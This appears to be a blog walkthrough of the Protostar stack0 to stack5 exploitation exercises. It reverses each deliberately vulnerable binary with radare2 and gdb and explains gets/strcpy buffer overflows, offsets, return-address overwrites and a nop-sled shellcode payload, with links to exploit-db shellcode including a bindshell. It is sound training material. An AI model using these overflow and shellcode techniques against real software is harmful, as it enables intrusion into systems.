These exercises can be found at https://exploit-exercises.com/protostar/
To spice thing up I decided to download the binaries on a local box and reverse engineer them rather than looking at the source-code that is provided at the webpage.
I'll be using pwntools to write the exploits, this is an awesome python exploitation library that can be found at https://github.com/Gallopsled/pwntools. And i'll be radare2 for reversing the binaries and gdb for debugging. Radare can be found at http://radare.org.
So loading the binary in radare, we get the following structure.
.----------------------------------------------.
| [0x80483f4] ;[c] |
| ;-- main: |
| (fcn) sym.main 65 |
| sym.main (); |
| ; var int local_1ch @ esp+0x1c |
| ; var int local_5ch @ esp+0x5c |
| push ebp |
| mov ebp, esp |
| and esp, 0xfffffff0 |
| sub esp, 0x60 |
| mov dword [esp + local_5ch], 0 |
| lea eax, [esp + local_1ch] |
| mov dword [esp], eax |
| call sym.imp.gets ;[a]; char*gets(char *s); |
| mov eax, dword [esp + local_5ch] |
| test eax, eax |
| je 0x8048427 ;[b] |
`----------------------------------------------'
f t
.---------------------------------------' '-------------------------.
| |
| |
.---------------------------------------------------------------. .---------------------------------------------------.
| 0x8048419 ;[f] | | 0x8048427 ;[b] |
| mov dword [esp], str.you_have_changed_the__modified__variable | | mov dword [esp], str.Try_again_ |
| call sym.imp.puts ;[d]; int puts(const char *s); | | call sym.imp.puts ;[d]; int puts(const char *s); |
| jmp 0x8048433 ;[e] | `---------------------------------------------------'
`---------------------------------------------------------------' v
v |
'----------------------------------------------------.----------------'
|
|
.--------------------.
| 0x8048433 ;[e] |
| leave |
| ret |
`--------------------'
Lets walk through the application to get an underastanding of what it does. The program will first set up the main functions stack-frame with the usual prolog of pushing the base pointer (ebp) onto the stack. Then aligning the stack pointer (esp) to the new stackframe by moving it to pont directly at the base (ebp).
It will then reserve 96 bytes on the stack by subtracting esp with hex 0x60. We note that there are two local variables recognized by radare, one at esp+0x1c and one at esp+0x5c.
The program will then zero out a variable located on the stack at esp+0x1c. This is most likely equivalent to "int local_var = 0;" in C. It then loads an effective address into eax which in this case is a pointer to the local variable. Then it moves the value from esp into eax for later comparison. It then moves the content of eax onto the top of the stack.
We can provide input to the program trough the gets() function. Here lies the vulnerability of the program. gets wont check how long the input that we provide is. In the man page of gets we can read the following: "Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use."
The test instruction will then do a logical AND operation of the eax regiester. If the result of 0 AND 0 which is 0, meaning that the Zero-flag is set, the statement will be true and we jump to the "try again" branch. If the result is anything but 0, the statement will we false and we will jump the the code block that completes the challenge.
This binary takes indata as an argument. When disassembling this program I first note that it performes a check that an argument is specified. If argc is less than 2, we get the message "please specify an argument".
Further down the execution chain we get to the more juicy stuff.
| lea eax, [esp + local_1ch] |
| mov dword [esp], eax |
| call sym.imp.strcpy ;[e]; char *strcpy(char *dest, const char *src); |
| mov eax, dword [esp + local_5ch] |
| cmp eax, 0x61626364 |
| jne 0x80484c0 ;[f] |
`-----------------------------------------------------------------------'
f t
.----------------------------------------' '--------------------------------------.
| |
| |
.-----------------------------------------------------------------------------. .------------------------------------------------------------.
| 0x80484b2 ;[i] | | 0x80484c0 ;[f] |
| mov dword [esp], str.you_have_correctly_got_the_variable_to_the_right_value | | mov edx, dword [esp + local_5ch] |
| call sym.imp.puts ;[g]; int puts(const char *s); | | mov eax, str.Try_again__you_got_0x_08x_n |
| jmp 0x80484d5 ;[h] | | mov dword [esp + local_4h], edx |
`-----------------------------------------------------------------------------' | mov dword [esp], eax |
| call sym.imp.printf ;[j]; int printf(const char *format); |
`------------------------------------------------------------'
We notice a call to strcpy(), which is a vulnerable function that does not include any boundary checks. This means that we can overwrite the buffer that the function stores it's data inside. Then it looks like the application is comparing the data in eax with the hex value "0x61626364". This translates to "abcd" in ascii. Interesting, so if we can overwrite the variable after the buffer with "abcd" we complete the challenge.
To confirm the offset we need to overwrite the local variable we can either send a cyclic pattern to the application and then check how far into our buffer our target value is located. Or we can look in the disassembled code. We note that 0x5ch - 0x1ch is 0x40 which is equal to 64. So if we create a buffer of 64 followed by the value 0x61626364 we should be at the right spot. Remember to convert the string to little endian before sending it to the program.
When running the program without any arguments we get a message telling us to set a envrionment variable called "GREENIE". In the disassembly we see a call to the getenv() function and then a compare to check if this variable is set.
As seen below, the program then sets up some local variables and basically copies the value from the GREENIE environment variable into another local var, most likely a buffer. Then there is a compare between the value of the local_58h variable and the value "0xd0a0d0a". Like in the previous levels, if we can overwrite the variable with that value we are home safe.
Snipped disassembly:
.-----------------------------------------------------------------------.
| 0x80484c8 ;[b] |
| mov dword [esp + local_58h], 0 |
| mov eax, dword [esp + local_5ch] |
| mov dword [esp + local_4h], eax |
| lea eax, [esp + local_18h] |
| mov dword [esp], eax |
| call sym.imp.strcpy ;[f]; char *strcpy(char *dest, const char *src); |
| mov eax, dword [esp + local_58h] |
| cmp eax, 0xd0a0d0a |
| jne 0x80484fd ;[g] |
`-----------------------------------------------------------------------'
f t
.-----------------------------' '-----------------------------------.
| |
| |
.---------------------------------------------------------------. .------------------------------------------------------------.
| 0x80484ef ;[j] | | 0x80484fd ;[g] |
| mov dword [esp], str.you_have_correctly_modified_the_variable | | mov edx, dword [esp + local_58h] |
| call sym.imp.puts ;[h]; int puts(const char *s); | | mov eax, str.Try_again__you_got_0x_08x_n |
| jmp 0x8048512 ;[i] | | mov dword [esp + local_4h], edx |
`---------------------------------------------------------------' | mov dword [esp], eax |
| call sym.imp.printf ;[k]; int printf(const char *format); |
`------------------------------------------------------------'
So by checking the offset as done in the previous levels we note that it is the same. If we create a payload with the first 64 bytes filled with junk and then the value and setting the GREENIE var with this we complete the challenge.
The description for this level says that we need to locate a function called Win and then redirect the execution flow of the program to that function.
To find out the address of the Win() function we can simply use the afl command in radare to list all functions:
[0x08048370]> afl
0x080482e0 3 48 sym._init
0x08048320 1 6 loc.imp.__gmon_start__
0x08048330 1 6 sym.imp.gets
0x08048340 1 6 sym.imp.__libc_start_main
0x08048350 1 6 sym.imp.printf
0x08048360 1 6 sym.imp.puts
0x08048370 1 33 entry0
0x080483a0 6 85 sym.__do_global_dtors_aux
0x08048400 4 35 sym.frame_dummy
0x08048424 1 20 sym.win
0x08048438 3 65 sym.main
0x08048480 1 5 sym.__libc_csu_fini
0x08048490 4 90 sym.__libc_csu_init
0x080484ea 1 4 sym.__i686.get_pc_thunk.bx
0x080484f0 4 42 sym.__do_global_ctors_aux
0x0804851c 1 28 sym._fini
The Win() function is located at 0x08048424. A quick disassemble of the win function shows the following string is printed "code flow successfully changed", using the puts() function.
mov dword [esp], str.code_flow_successfully_changed ;
call sym.imp.puts
So we can assume that the application will somwhow call the address we supply with our buffer(if we hit the offset correctly). Let's examine the main function:
.----------------------------------------------.
| [0x8048438] ;[c] |
| ;-- main: |
| (fcn) sym.main 65 |
| sym.main (int arg_5ch); |
| ; var int local_4h @ esp+0x4 |
| ; var int local_1ch @ esp+0x1c |
| ; arg int arg_5ch @ esp+0x5c |
| push ebp |
| mov ebp, esp |
| and esp, 0xfffffff0 |
| sub esp, 0x60 |
| mov dword [esp + arg_5ch], 0 |
| lea eax, [esp + local_1ch] |
| mov dword [esp], eax |
| call sym.imp.gets ;[a]; char*gets(char *s); |
| cmp dword [esp + arg_5ch], 0 |
| je 0x8048477 ;[b] |
`----------------------------------------------'
f t
.------------------------' '--------------------------------.
| |
| |
.------------------------------------------------------------. |
| 0x804845c ;[e] | |
| mov eax, str.calling_function_pointer__jumping_to_0x_08x_n | |
| mov edx, dword [esp + arg_5ch] | |
| mov dword [esp + local_4h], edx | |
| mov dword [esp], eax | |
| call sym.imp.printf ;[d]; int printf(const char *format); | |
| mov eax, dword [esp + arg_5ch] | |
| call eax | |
`------------------------------------------------------------' |
v |
'-------------------------------------. .-------------------'
| |
| |
.--------------------.
| 0x8048477 ;[b] |
| leave |
| ret |
`--------------------'
We have the usual set up of the stack frame. We note a couple of local variables. The binary then calls gets(), this is where we can supply our input. As I explained in the first level, gets is a very dangerous function to use.
A comparison is then made to check if we supply any input to the gets function, if not, the program will jump to the leave and ret instructions. Then a format string is pushed on the stack just before printf() is called. After this happens, the address that we supplied is moved into eax and then called.
So all we need to do is to craft a payload that writes past the buffer with the correct memory address of Win() which is then called by main.
The goal in this level is the same as the previous, we want to shift the execution flow of the program to the Win() function. Although this time, we want to overwrite the return address of the function and get control over eip rather than the program itself calling the address we supply to it like inte the last level. This is to mimic how an actual "direct ret overwrite" buffer overflow would work.
If we supply a large input to the application we get an segmentation fault. Interesting, this suggests that the application may be vulnerable to some kind of overflow. Lets see if we can control eip. When supplying a lot of capital A's (0x41) to the program attached to gdb we note that eip contains the value 0x41414141. Bingo.
When debugging a program I find radare rather difficult to use, so I tend to use gdb instead.
To figure out the offset we can use the cyclic pattern technique as we did before. Then it's only a matter of constructing the payload as the previous level with the address of the win() function.
#Stack5
Now this is where things get more interesting. Now we will introduce shellcode into our exploit.
Disassembling the binary show us that it is very basic. The only thing it does is taking inputh through gets().
.----------------------------------------------.
| [0x80483c4] ;[b] |
| ;-- main: |
| (fcn) sym.main 23 |
| sym.main (); |
| ; var int local_10h @ esp+0x10 |
| push ebp |
| mov ebp, esp |
| and esp, 0xfffffff0 |
| sub esp, 0x50 |
| lea eax, [esp + local_10h] |
| mov dword [esp], eax |
| call sym.imp.gets ;[a]; char*gets(char *s); |
| leave |
| ret |
`----------------------------------------------'
As in the previous level, the return address is located 76 bytes into our buffer. This can be easily verified by supplying the previous payload and check the value of EIP in gdb.
So the plan is to send a payload like this:
Junk + ret + nops + shellcode
So we need to figure out an address that points to our shellcode and the shellcode to spawn a shell or similar.
Using gdb we find a suitable ret at 0xffffd3e8, this address will land us in the middle of our nopsled.
After experimenting with a couple of execve(/bin/bash) shellcodes I found out that when dealing with the function gets(), the spawned shell will be immediately terminated. There are however specialized shellcode out there for this.
Such shellcode can be found here: https://www.exploit-db.com/exploits/13357/
To spawn a local bindshell i used the following shellcode: https://www.exploit-db.com/exploits/14332/
So now we have all the information we need to construct the payload.